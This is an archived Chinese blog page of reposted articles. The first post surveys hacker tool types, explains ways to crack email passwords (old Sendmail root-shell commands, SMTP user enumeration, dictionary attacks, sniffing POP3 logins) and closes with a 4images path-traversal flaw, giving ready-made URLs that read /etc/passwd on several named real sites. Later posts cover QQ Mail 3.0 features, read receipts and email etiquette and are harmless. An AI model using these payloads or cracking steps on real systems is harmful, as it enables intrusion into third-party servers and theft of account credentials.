• 2006年07月10日

    揭密黑客兵器的四大基本派系!   -[]

    揭密黑客兵器的四大基本派系!
    网页教学网 【转载】
    说起这年头的黑客,其实只有其中不足1‰的才是真正的黑客——或者查找系统、软件、网络上的漏洞并编出相应的补丁以提醒有关人员修补(这其实是“红客”),或利用这些网上漏洞进行盗账号、窃密等非法勾当( 这才是“黑客”);剩下的999‰则是那些会用几个现成的傻瓜黑客小工具做些尝试性地窥探或者破坏的“准”黑客而已。但无论是哪种黑客,都得用些黑客工具软件。纵观这些乱七八糟的黑客工具,不难发现这些黑兵器共分为四大派系。
      第一派系:远程控制系
      它脱胎于四千多年前特洛伊城中的那个大木马,就是现在特别活跃的那些木马后门程序。包括两个部分:1.被控端,又称服务端,将其植入要控制的PC内,用于记录用户的相关信息(特别是密码、账号之类的特别信息),相当于给人安了个后门;2.控制端,又称客户端(千万别和前者搞混了!),是黑客用于操纵的一端,用来发布黑客的控制命令,例如屏幕截图、记录用户的键盘操作、传传文件甚至是格式化你的硬盘。
      远程控制系的功夫都十分厉害,一旦你中招就没了秘密,你的一切对幕后的那些(可能有很多个)黑客来说都是完全透明的,他能任意操纵你PC上的文件、重启、关机……一句话,此时你的PC就是他的。比较有名的有灰鸽子、冰河、广外女生、BO及木马BEAST等等,它们是黑兵器中种类最齐全、数目最多、破坏性最大的一派。
      第二派系:漏洞扫描系
      此派系主要是对付操作系统,不用说,Windows自然咸了众矢之的。这些年来,微软不断地缝补Windows,就是因为有太多的漏洞被人扫描出来,像Unicode漏洞、CGI漏洞、WebDAV溢出漏洞、idq-ida溢出漏洞等。其中最常见的就是端口扫描,它能根据操作系统开放了各个端口的反馈信息来进行探测,从而为下一步攻击找出最佳点。像X-Scan、流光、代理猎手、溯雪、Super-Scan、追捕之流就是该派系中的佼佼者,可以说该派系是黑客作案的踩点器。
    第三派系:信息炸弹系
      最初只是用来轰炸邮箱,就是把大量的垃圾邮件不断塞入同一信箱内,直至最终撑爆它。后来又发展到QQ炸弹(把你从QQ踢下来)、蓝屏攻击(使你的PC出现蓝屏而不得不重启)等,还有的是恶攻服务器,使服务器不堪重负并导致线路拥塞直至崩溃。此为黑客报复、泄愤的惯用招式(如几年前的中美黑客大战就属这种类型),属于一种“面对面”的攻击。此派系的代表是KaBoom!、QQ千夫指、ICQ Revenge、WinNuke V95等。
      第四派系:暴力破解系
      此派系又称Cracker一族,是专门对付各种商业软件或共享软件的。因为除免费软件外,几乎所有软件都要求用户输入注册信息(如用户名、机器码或者注册码),当然这些都得用钱来买,否则就要受功能或者日期的限制。黑客们只须套上个字典文件,把其中的用户名和密码逐一取出试用,直到遇上那个正确的为止。只要他们把字典文件设置得当,破解这类软件只是个时间问题,此法法是穷举破解,又称为暴力破解。还有的是直接记录调进内存的注册码明文或者密文信息,经过提取、对比、分析(这里面要用到一些比较复杂的汇编语言方面知识),最后算出可用的注册码。不管用哪种方式,黑客最后都会给成功破解的软件加上一个所谓的注册机或者“打狗棒”程序,以达到与合法用户相同的权限。像网络刺客2、Language2000及WinHex等均属此类。此外,还有一种专门探查星号式密码的工具,一般用来破解共享的密码或者屏保密码、QQ密码等。因为密码多用星号掩盖,而它们就能把这些星号还原成明文显示,如星星密语、SnadBoy's Revelation和PQwak等。

    教你强力破解E-mail密码的三种方法
    中安网培 【转载】
    电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。
      一、利用邮件服务器操作系统的漏洞

      邮件服务器软件是运行在特定的操作系统上的,如Linux、Windows NT/2000等。这些操作系统的默认安装和配置都是不安全的,黑客可以轻易入侵系统,获得所有用户名和密码。
      1 Windows服务器
      如果是基于Windows2000的Exchange Mail Server,系统本身未做任何安全配置,开放了若干服务。入侵者可以利用终端服务器结合中文输入法漏洞或者IIS的Buffer Overflow程序获得Administrator权限,用pwduMP3导出Hash过的密码,再用L0pht挂接字典或者Brute Force就能破解出用户密码。根据经验,如果密码简单,几分钟之内就能破解出,长度在8位及以下的用Brute Force方式在一天内就能解出。
      2 Linux/UNIX服务器
      UNIX类系统一般采用Sendmail作为邮件系统,在获得了系统的控制权之后,用John等软件就能从/etc/passwd或者/etc/shadow中破解出密码。如果采用了数据库方式来保存用户信息和密码,也是很容易被导出。
      二、利用邮件服务器软件本身的漏洞
      最常见的邮件服务器程序有Sendmail,Qmail等,在不同程度在都存在安全缺陷。以Sendmail为例,再以前的老版本中,telnet到25端口,输入wiz,然后接着输入shell,就能获得一个rootshell,还有debug命令,也能获得root权限。Qmail相对Sendmail安全,但是Qpoper存在Buffer Overflow缺陷,能够远程得到rootshell,进而控制系统。
      即使邮件服务器是安全的,但是入侵者还能获得更多的信息,比如用户名。telnet到25端口,输入expn tom或者vrfy tom就能查询系统是否有tom用户。最新版本的Sendmail虽然禁用了这两个命令,但是可以通过伪造发信人然后用rcpt to来判断该用户是否存在。
    得到了用户名,可以telnet到110端口,尝试简单密码的连接,或者套用字典破解。
      所以,必须禁止非本域的中继利用(relay),或者采用现在很多ISP都采用的给SMTP加上发信认证的模块,这样能够增强邮件服务器的安全。
      除了POP3方式收信之外,比较流行的是在WEB界面上处理邮件。这种方式也不无弱点,一般是通过CGI来接受用户传递的表单form参数,包括username和password,如果正确,就可以进入处理邮件的页面。破解已知用户的密码,有很多套用字典或者暴力组合的软件可用,比较著名的是小榕的《溯雪》,在密码简单的情况下,很快就有结果。
      WEB邮件系统都有“忘记密码”的选项,如果能破解寄回密码的另外一个邮箱或者猜出提示问题的答案,也能成功。
      三、在邮件的传输过程中窃听
      在网络中安装Sniffer,指定监听往外部服务器110端口发送的数据包,从收集下来的信息中查看user和pass后的字符串就能看到用户名和相应的密码。

    4images的一个严重漏洞


    由于index.php文件没有进行对外部数据提交过滤.导致可以执行系统命令来查询用户以及密码。
    对于搞unix机器来说是个好东西
    以下测试的结果...
    羊城晚报的密码:
    http://forum.ycwb.net/4images/index.php?template=../../../../../../../etc/passwd%00
    台湾某站:
    http://www.helzone.com/4images/index.php?template=../../../../../../../etc/passwd%00
    http://www.wed.com.tw/album/index.php?template=../../../../../../../etc/passwd%00
    Tag:黑客 破解 e-mail 密码 漏洞
    chapi 发表于00时00分00秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2006年04月15日

    腾讯的QQ Mail 3.0 让我悄悄爱上你

    腾讯的QQ Mail 3.0 让我悄悄爱上你
    电脑迷 【转载】 作者:日出东方

        你会用QQ邮箱来发邮件吗?可能绝大多数人都会摇头。不稳定、容量小、功能少成了它被用户遗弃的主要原因。现在我来悄悄告诉你,如今的QQ邮箱升级了,功能也是今非夕比,看过它的新功能后,你没有理由不爱上它。在使用QQMail3.0前需要先升级,关于如何升级参见本期网络技巧《将QQ邮箱免费升级到1GB》一文。
        “今日”导航更轻松
        在QQ面板上点击“收发邮件”按钮打开QQMail3.0版,一个以蓝色为基调的窗口映入眼帘,标签式的界面给人以清新、简洁之美,“今日”就是标签之一。“今日”标签相当于一个导航界面,在这里可以直观地看到有多少新邮件,可以直接输入好友的邮箱地址发信,还能显示好友的相册、查看本地的天气情况等。
        阅读邮件更方便
        在“今日”标签里点击“收件箱”,立刻就可以看到QQ邮箱的庐山真面目,在界面上与大家常用的邮件客户端Outlook十分相似。整个界面被分为三栏,从左到右依次是文件夹区、邮件主题区和邮件内容区,在邮件主题区点击某个邮件,它的内容马上就会在邮件内容区显示出来,这就是QQMail3.0增加的邮件预览功能。在预览邮件时,点击邮件内容区右上角的“最大化窗口读信”按钮可以在全屏方式下阅读邮件,点击邮件内容区下方的“快捷回复”或“快捷转发”按钮,可以对邮件做相应的处理(如图1)。

            图1
        地址导入更智能
        在我们将邮箱升级到QQMail3.0时,QQMail会自动将QQ里的好友分组导入到邮箱的通讯录中,默认邮箱地址均为好友的QQ邮箱。地址导入功能还支持增量导入,当我们在QQ里新加了好友后,可以把新加好友的邮箱增量添加到通讯录中。切换到“通讯录”标签,点击右侧的“导入/导出通讯录”,接着再点击“导入QQ好友及QQ分组”小标签,选中“合并入同名分组”,点击“开始导入”,稍候便可以把新好友添加到通讯录中了。
        条条大道通罗马
        在QQMail3.0中,几乎在随处都可以发邮件,发信的花样也很多。
        “今日”邮件闪电发
        在“今日”标签中,点击“快捷方式”下的“选择QQ好友”,马上弹出一个简易的通讯录(如图2),包含所有好友的QQ邮箱地址。简易通讯录支持按QQ好友的昵称首字母分类检索,方便大家迅速找到好友的邮箱地址。点击某位好友的邮箱地址后,再点击“发邮件”,就自动切换到了“写信”标签。如果想给多位好友发邮件,在简易通讯录中连续点击邮箱地址即可。除了使用通讯录,还可以手工输入邮箱地址,QQMail会从通讯录中检索符合条件的记录自动补齐输入的地址。

            图2
        在联系人资料卡中快速写信
        切换到“通讯录”标签,点击某个邮件地址如“远方(80717236@qq.com)”,在右边马上就显示出该联系人的详细资料,直接点击联系人资料卡上方的“给‘远方’写邮件”就可以切换到写邮件窗口了。
        邮件群发
        在QQMail3.0中群发邮件是相当愉快的,最直接的方法就是在联系人资料卡中点击每个邮箱地址前的复选框来添加临时的群发名单。由于QQMail中的联系人分组与QQ好友分组是同步的,如果要给现成的分组群发邮件就显得非常方便。比如过节的时候要给所有的编辑发一封祝福信,点击“通讯录”标签中的“联系组”链接,然后选中“编辑”组,然后点击页面右侧的“写信”,再写好邮件主题和内容后就可以群发了(如图3)。

            图3
        QQMail3.0在易用性上可谓是下了大功夫,除了“今日”导航和方便的邮件预览,随处都可以看到人性化的功能。比如在输入邮件地址的地方,都会看到一个按QQ好友昵称首字母分类检索的工具条(从图2和图3中已有体现),从此不再需要记忆繁多的邮件地址了。


    E-Mail“发送报告”邮件已收我知道
    电脑迷 【转载】 作者:一帘幽梦

        我们在阅读电子邮件时,经常会弹出发件人要求进行回执或发送收条的提示框,当你点击同意后就会自动给发件人寄去一封表示邮件已收到的邮件(如图1)。这种让电子邮件到达后要求回执的功能提高了邮件到达确认的效率,加强了双方的联系。目前常用的Web电子邮箱和邮箱客户端程序都具有这个实用功能。下面就分别以126电子邮箱、Foxmail和Outlook 2003邮箱客户端程序为例,介绍如何让已发送的电子邮件报平安。

            图1
      126电子邮箱
        登陆126电子邮箱,当点击“写信”按钮进入邮件编辑页面后,在页面下方勾选“已读回执”选框即可为该邮件添加要求回执功能。另外点击页面右上角的“参数设置”选项,选中“发回执(收到对方要求回执的邮件后:都直接发送回执)”选框,点击“确定”按钮后,以后当收到要求回执的邮件后,系统会自动发送回执邮件而无须再手动选择。
        Foxmail
        在Foxmail的“写邮件”窗口中,打开“选项”菜单,勾选“请求阅读收条”选项即可为当前邮件手动添加要求回执功能。如果要Foxmail为每一封发送的邮件自动添加要求回执功能,在主界面中打开“工具/系统设置/收条”窗口(如图2),在“请求阅读收条”栏中勾选“对所有发送的邮件请求收条”选框即可实现自动添加回执功能。而在“返回阅读收条”栏中同样可以设置成手动或自动发送回执邮件。最后点击“确定”按钮即可。

            图2
        Outlook 2003
        在Outlook 2003的邮件编辑窗口中,点击“选项”按钮,然后分别勾选“请在送达此邮件后给出‘送达’回执”和“请在阅读此邮件后给出‘已读’回执”两个选框,点击“关闭”按钮即可。这样就可以在对方收到和阅读邮件时都要求发送回执邮件,使自己对邮件状态更加清楚。如果要实现系统自动添加回执功能或是对要求回执的已接收邮件进行自动处理时,在Outlook 2003主界面中依次点击“工具/选项/首选参数/电子邮件选项/跟踪选项”按钮,打开“跟踪选项”对话框即可按需进行设置了(如图3)。

            图3
    Tag:腾讯 QQ e-mail 发送报告 邮件
    chapi 发表于21时13分01秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2005年12月21日

    哈佛:收发E-mail十准则

    作者:未知 文章来源:新浪论坛
    哈佛商学院:收发E-mail十准则

    哈佛商学院在电信史上第一次堤出了“收发E-mail十准则”。而这个准则案例由全球领先的电子商务交易平台--全球采购网站 123trading.com 经过多家客户的调查而撰写的报告! 太对了,是该为网络空间制订一些规则了:为了让你有一个全面的了解,我们来向你介绍123trading.com他们制订的在编写和使用E-mail时的准则。

    1、及时删除

    “检查所有E-mail的标题,将过时的E-mail或是垃圾邮件及时删除。”在信箱中堆积E-mail毫无意义,如果文件很大还会毫无必要地占用空间。就像清除无用的信函那样,将无用的E-mail也清除掉吧。

    2、不加附件

    “在企业界,许多人浪费许多精力和时间来与那些格式不兼容、毫无内容或是永远无法打开的附件作斗争。”最好的做法就是不到万不得已不要发附件。在接受附件时也千万小心,不要接受从陌生地址发来的附件,其中可能藏有病毒。

    3、三思后行

    “不要在你疲劳、紧张或愤怒的情况下发E-mail。这种状态下你很容易变得暴躁、易怒和挑剔。你可能需要很多时间来消除一时造成的损失。”要像对待信函或者电话一样对待你的E-mail,三思而行,等你自己平静下来以后再按下发送的按键。

    4、绝非万能

    “不要用E-mail来代替面对面的会见,特别是在你要批评一个人、辞退一个人或是表彰一个人的时候。”什么交流方式都比不上实实在在的面谈谈。记住,用E-mail与人沟通容易造成缺乏敬意的印象。

    5、保留地址

    “永远不要从你的通讯录中删除人名或者地址,很可能你什么时候就会再需要他们。”利用所有E-mail能够提供给你的资源,要学会使用所有的功能。

    6、不加壁纸

    “许多公司部的网络禁止为E-mail加上华丽的壁纸,不要尝试违反这个规定。”壁纸不仅仅是被视为垃圾,而且也会使E-mail变得“体积庞大”,令人讨厌。特别那些内容空洞的E-mail。

    7、不传留言

    “不要用E-mail系统传播关于具体某人的留言蜚语。E-mail不仅仅是易于复制消息的工具,也可以成为法庭上的证据。”记住,使用E-mail很容易将这些留言传播到当事人的耳中。

    8、郑重对待

    “回复一封气愤或是侮辱性的E-mail是一个在错。”不要在E-mail中写下见不得人的语言,不然你会被看做是一个缺乏价值不值得敬重的人。

    9、最后手段

    “当你希望召集你的同事来开会时,首先考虑的方式是电话,然后是电话留言,最后才考虑E-mail。”个人会面比计算机之间的电子交流更为亲切。不要通过E-mail邀请朋友来共进晚餐或是通知同事召开会议。

    10、学会谅解

    “如果你希望安全完美地发送一个信息,请不要使用E-mail,去寻找其他的手段。”许多时候,E-mail系统就像是“邮件的百慕大三角区”,经常会莫名其妙地出现地址、打印甚至语法错误。最后的方法是在发送以前将E-mail打印出来仔细检查,谁都做不到十全十美。

    Tag:哈佛 e-mail 准则
    chapi 发表于20时21分45秒 | 阅读全文 | 评论 0 | 编辑 | 分享
共1页 1

Lessons by English, baby!

随时随地看wap